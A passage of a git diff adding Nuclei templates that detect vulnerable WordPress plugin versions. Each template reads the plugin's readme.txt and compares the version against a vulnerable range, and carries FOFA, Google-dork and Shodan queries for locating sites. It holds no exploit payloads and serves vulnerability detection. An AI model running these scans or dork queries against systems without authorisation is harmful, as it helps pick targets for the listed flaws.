cve,wordpress,wp-plugin,abcbiz-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/abcbiz-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "abcbiz-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.2') \ No newline at end of file diff --git a/poc/other/acf-frontend-form-element-37cf54b4fd530e8cbe84be3c76ac823a.yaml b/poc/other/acf-frontend-form-element-37cf54b4fd530e8cbe84be3c76ac823a.yaml new file mode 100644 index 0000000000..90583c4e9e --- /dev/null +++ b/poc/other/acf-frontend-form-element-37cf54b4fd530e8cbe84be3c76ac823a.yaml @@ -0,0 +1,59 @@ +id: acf-frontend-form-element-37cf54b4fd530e8cbe84be3c76ac823a + +info: + name: > + Frontend Admin by DynamiApps <= 3.24.5 - Unauthenticated Privilege Escalation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e9fdc833-8384-42c0-ad9b-72e5b6351964?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/acf-frontend-form-element/" + google-query: inurl:"/wp-content/plugins/acf-frontend-form-element/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,acf-frontend-form-element,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-frontend-form-element/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-frontend-form-element" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.24.5') \ No newline at end of file diff --git a/poc/other/acf-frontend-form-element-e002b76cae1c5fe698d73bad818d1658.yaml b/poc/other/acf-frontend-form-element-e002b76cae1c5fe698d73bad818d1658.yaml new file mode 100644 index 0000000000..9b295aae85 --- /dev/null +++ b/poc/other/acf-frontend-form-element-e002b76cae1c5fe698d73bad818d1658.yaml @@ -0,0 +1,59 @@ +id: acf-frontend-form-element-e002b76cae1c5fe698d73bad818d1658 + +info: + name: > + Frontend Admin by DynamiApps <= 3.24.5 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a464f4-c357-446f-a5b8-0919d9af56c9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/acf-frontend-form-element/" + google-query: inurl:"/wp-content/plugins/acf-frontend-form-element/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,acf-frontend-form-element,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-frontend-form-element/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-frontend-form-element" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.24.5') \ No newline at end of file diff --git a/poc/other/aio-contact.yaml b/poc/other/aio-contact.yaml new file mode 100644 index 0000000000..de15d1548c --- /dev/null +++ b/poc/other/aio-contact.yaml @@ -0,0 +1,59 @@ +id: aio-contact-cdedb1c05262fbd14f43d1c46990cca3 + +info: + name: > + AIO Contact <= 2.8.1 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e4c7d179-9b65-48da-b92e-11fb0629653a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/aio-contact/" + google-query: inurl:"/wp-content/plugins/aio-contact/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,aio-contact,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/aio-contact/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "aio-contact" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.1') \ No newline at end of file diff --git a/poc/other/all-in-one-slider.yaml b/poc/other/all-in-one-slider.yaml new file mode 100644 index 0000000000..4067e93635 --- /dev/null +++ b/poc/other/all-in-one-slider.yaml @@ -0,0 +1,59 @@ +id: all-in-one-slider-14b7d4b703641121459b5014bbc6bd54 + +info: + name: > + All in One Slider <= 1.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1371d1ea-a415-4cd8-bc99-a530670ffb94?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/all-in-one-slider/" + google-query: inurl:"/wp-content/plugins/all-in-one-slider/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,all-in-one-slider,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-in-one-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-in-one-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/other/alphabetical-list.yaml b/poc/other/alphabetical-list.yaml new file mode 100644 index 0000000000..5025cc1e3d --- /dev/null +++ b/poc/other/alphabetical-list.yaml @@ -0,0 +1,59 @@ +id: alphabetical-list-fcb529436e163b55fffdd5d732bd07fe + +info: + name: > + Alphabetical List <= 1.0.3 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2952a7bf-ccbf-46e0-ac7e-54576f413f66?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/alphabetical-list/" + google-query: inurl:"/wp-content/plugins/alphabetical-list/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,alphabetical-list,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/alphabetical-list/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "alphabetical-list" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.3') \ No newline at end of file diff --git a/poc/other/bin-stripe-donation-a3308f3b5497bd4ba2d82def5ce6916c.yaml b/poc/other/bin-stripe-donation-a3308f3b5497bd4ba2d82def5ce6916c.yaml new file mode 100644 index 0000000000..e0318ccec7 --- /dev/null +++ b/poc/other/bin-stripe-donation-a3308f3b5497bd4ba2d82def5ce6916c.yaml @@ -0,0 +1,59 @@ +id: bin-stripe-donation-a3308f3b5497bd4ba2d82def5ce6916c + +info: + name: > + Stripe Donation <= 1.2.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a028937-38bb-4c28-aaa1-60a86124c998?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bin-stripe-donation/" + google-query: inurl:"/wp-content/plugins/bin-stripe-donation/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bin-stripe-donation,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bin-stripe-donation/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bin-stripe-donation" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5') \ No newline at end of file diff --git a/poc/other/blizzard-quotes.yaml b/poc/other/blizzard-quotes.yaml new file mode 100644 index 0000000000..fd8d20080d --- /dev/null +++ b/poc/other/blizzard-quotes.yaml @@ -0,0 +1,59 @@ +id: blizzard-quotes-bde5ee51c28fdec7059f71aa63b9d52f + +info: + name: > + Blizzard Quotes <= 1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/06d4a12c-9503-4e89-85e7-64838a42dc28?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/blizzard-quotes/" + google-query: inurl:"/wp-content/plugins/blizzard-quotes/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,blizzard-quotes,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blizzard-quotes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blizzard-quotes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/other/bodi0s-easy-cache-b25e0848713a993a19d7a570188681d3.yaml b/poc/other/bodi0s-easy-cache-b25e0848713a993a19d7a570188681d3.yaml new file mode 100644 index 0000000000..6303aa5b49 --- /dev/null +++ b/poc/other/bodi0s-easy-cache-b25e0848713a993a19d7a570188681d3.yaml @@ -0,0 +1,59 @@ +id: bodi0s-easy-cache-b25e0848713a993a19d7a570188681d3 + +info: + name: > + bodi0’s Easy Cache <= 0.8 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/087034aa-efd0-44b9-9a2f-3a625806bcaa?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bodi0s-easy-cache/" + google-query: inurl:"/wp-content/plugins/bodi0s-easy-cache/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bodi0s-easy-cache,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bodi0s-easy-cache/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bodi0s-easy-cache" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8') \ No newline at end of file diff --git a/poc/other/booking-system-trafft.yaml b/poc/other/booking-system-trafft.yaml new file mode 100644 index 0000000000..7966bd4649 --- /dev/null +++ b/poc/other/booking-system-trafft.yaml @@ -0,0 +1,59 @@ +id: booking-system-trafft-5c6449fdf82d85068f035ee2f7c81477 + +info: + name: > + Booking System Trafft <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/84adbde0-9a9b-4a76-9333-56880fcc139d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/booking-system-trafft/" + google-query: inurl:"/wp-content/plugins/booking-system-trafft/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,booking-system-trafft,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-system-trafft/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-system-trafft" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/other/buk-appointments-ae0876cbc8a6ea5bc63f81816ddd03a6.yaml b/poc/other/buk-appointments-ae0876cbc8a6ea5bc63f81816ddd03a6.yaml new file mode 100644 index 0000000000..c357423da1 --- /dev/null +++ b/poc/other/buk-appointments-ae0876cbc8a6ea5bc63f81816ddd03a6.yaml @@ -0,0 +1,59 @@ +id: buk-appointments-ae0876cbc8a6ea5bc63f81816ddd03a6 + +info: + name: > + Buk for WordPress <= 1.0.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1ebc34-d728-42b4-92b4-9e1a4ebd88b2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/buk-appointments/" + google-query: inurl:"/wp-content/plugins/buk-appointments/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,buk-appointments,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/buk-appointments/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "buk-appointments" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.7') \ No newline at end of file diff --git a/poc/other/bukza-1d18f7cdcaadc800f7e99e165e820759.yaml b/poc/other/bukza-1d18f7cdcaadc800f7e99e165e820759.yaml new file mode 100644 index 0000000000..f1d0bbd72d --- /dev/null +++ b/poc/other/bukza-1d18f7cdcaadc800f7e99e165e820759.yaml @@ -0,0 +1,59 @@ +id: bukza-1d18f7cdcaadc800f7e99e165e820759 + +info: + name: > + Bukza <= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3e348b24-4c49-43ed-b4f3-b31f0f709830?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bukza/" + google-query: inurl:"/wp-content/plugins/bukza/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bukza,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bukza/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bukza" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/other/bulk-role-change.yaml b/poc/other/bulk-role-change.yaml new file mode 100644 index 0000000000..d838b40aa8 --- /dev/null +++ b/poc/other/bulk-role-change.yaml @@ -0,0 +1,59 @@ +id: bulk-role-change-2184325438ba670b61cd9b6f6df928fc + +info: + name: > + Bulk Change Role <= 1.1 - Missing Authorization to Authenticated (Subscriber+) Privilege Escalation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e6e7889b-a1e2-439f-891d-c7c9a052cafc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bulk-role-change/" + google-query: inurl:"/wp-content/plugins/bulk-role-change/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bulk-role-change,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bulk-role-change/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bulk-role-change" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/other/cb-logo-slider.yaml b/poc/other/cb-logo-slider.yaml new file mode 100644 index 0000000000..fa419d9cf3 --- /dev/null +++ b/poc/other/cb-logo-slider.yaml @@ -0,0 +1,59 @@ +id: cb-logo-slider-6fc89698423781c51940a6f041af1e11 + +info: + name: > + Logo Slider <= 4.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6cc17a6-994c-4ac4-8175-263add849b1b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cb-logo-slider/" + google-query: inurl:"/wp-content/plugins/cb-logo-slider/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cb-logo-slider,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cb-logo-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cb-logo-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.0') \ No newline at end of file diff --git a/poc/other/companion-portfolio-99848fed06847f56568685ec4d7abf53.yaml b/poc/other/companion-portfolio-99848fed06847f56568685ec4d7abf53.yaml new file mode 100644 index 0000000000..ef222c6862 --- /dev/null +++ b/poc/other/companion-portfolio-99848fed06847f56568685ec4d7abf53.yaml @@ -0,0 +1,59 @@ +id: companion-portfolio-99848fed06847f56568685ec4d7abf53 + +info: + name: > + Companion Portfolio – Responsive Portfolio Plugin <= 2.4.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/21df75e6-1f3e-4a08-a620-92b44fb48899?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/companion-portfolio/" + google-query: inurl:"/wp-content/plugins/companion-portfolio/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,companion-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/companion-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "companion-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.0.1') \ No newline at end of file diff --git a/poc/other/connatix-video-embed-078fbbdf831b8258d6e8b451d9e7fb0e.yaml b/poc/other/connatix-video-embed-078fbbdf831b8258d6e8b451d9e7fb0e.yaml new file mode 100644 index 0000000000..0abd00e344 --- /dev/null +++ b/poc/other/connatix-video-embed-078fbbdf831b8258d6e8b451d9e7fb0e.yaml @@ -0,0 +1,59 @@ +id: connatix-video-embed-078fbbdf831b8258d6e8b451d9e7fb0e + +info: + name: > + Connatix Video Embed <= 1.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/89512190-a0fe-495a-9dda-8d8540a5325c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/connatix-video-embed/" + google-query: inurl:"/wp-content/plugins/connatix-video-embed/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,connatix-video-embed,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/connatix-video-embed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "connatix-video-embed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.5') \ No newline at end of file diff --git a/poc/other/crafthemes-demo-import-3d9ed4f73a1e8e89ff28ad42207f57cc.yaml b/poc/other/crafthemes-demo-import-3d9ed4f73a1e8e89ff28ad42207f57cc.yaml new file mode 100644 index 0000000000..750ae36213 --- /dev/null +++ b/poc/other/crafthemes-demo-import-3d9ed4f73a1e8e89ff28ad42207f57cc.yaml @@ -0,0 +1,59 @@ +id: crafthemes-demo-import-3d9ed4f73a1e8e89ff28ad42207f57cc + +info: + name: > + Crafthemes Demo Import <= 3.3 - Authenticated (Admin+) Arbitrary File Upload in process_uploaded_files + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e44dd0e8-e6e7-4a2d-b9ca-abd1de273092?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/crafthemes-demo-import/" + google-query: inurl:"/wp-content/plugins/crafthemes-demo-import/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,crafthemes-demo-import,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/crafthemes-demo-import/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "crafthemes-demo-import" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/other/designer.yaml b/poc/other/designer.yaml new file mode 100644 index 0000000000..208803512b --- /dev/null +++ b/poc/other/designer.yaml @@ -0,0 +1,59 @@ +id: designer-7fce07176e5a99557088287ca81287a3 + +info: + name: > + Designer <= 1.3.3 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/47a67db6-cc0d-47d2-a2c2-11b8c410f2fb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/designer/" + google-query: inurl:"/wp-content/plugins/designer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,designer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/designer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "designer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.3') \ No newline at end of file diff --git a/poc/other/dsdownloadlist.yaml b/poc/other/dsdownloadlist.yaml new file mode 100644 index 0000000000..74a50c5aea --- /dev/null +++ b/poc/other/dsdownloadlist.yaml @@ -0,0 +1,59 @@ +id: dsdownloadlist-563c0ddc96003b5bd029f38391d35cf2 + +info: + name: > + DS.DownloadList <= 1.3 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/600aef49-b918-4d58-a460-f9cdbeaa17dd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/dsdownloadlist/" + google-query: inurl:"/wp-content/plugins/dsdownloadlist/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,dsdownloadlist,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/dsdownloadlist/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "dsdownloadlist" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/other/eveeno-57163addaabbee05984ca77e6d31881e.yaml b/poc/other/eveeno-57163addaabbee05984ca77e6d31881e.yaml new file mode 100644 index 0000000000..c86f67f197 --- /dev/null +++ b/poc/other/eveeno-57163addaabbee05984ca77e6d31881e.yaml @@ -0,0 +1,59 @@ +id: eveeno-57163addaabbee05984ca77e6d31881e + +info: + name: > + Eveeno <= 1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e254f0ba-9008-44e9-bf8f-31c9614d6f64?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/eveeno/" + google-query: inurl:"/wp-content/plugins/eveeno/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,eveeno,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eveeno/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eveeno" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7') \ No newline at end of file diff --git a/poc/other/fat-services-booking.yaml b/poc/other/fat-services-booking.yaml new file mode 100644 index 0000000000..b11ead2b5e --- /dev/null +++ b/poc/other/fat-services-booking.yaml @@ -0,0 +1,59 @@ +id: fat-services-booking-b49b9540b1d61d0bb6646887776106fb + +info: + name: > + FAT Services Booking <= 5.6 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b03125e6-689b-46d7-8a39-3260d46fb17d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/fat-services-booking/" + google-query: inurl:"/wp-content/plugins/fat-services-booking/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,fat-services-booking,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fat-services-booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fat-services-booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.6') \ No newline at end of file diff --git a/poc/other/fluentform-73d12813260178303738b5378f138bfb.yaml b/poc/other/fluentform-73d12813260178303738b5378f138bfb.yaml new file mode 100644 index 0000000000..94ce5237ad --- /dev/null +++ b/poc/other/fluentform-73d12813260178303738b5378f138bfb.yaml @@ -0,0 +1,59 @@ 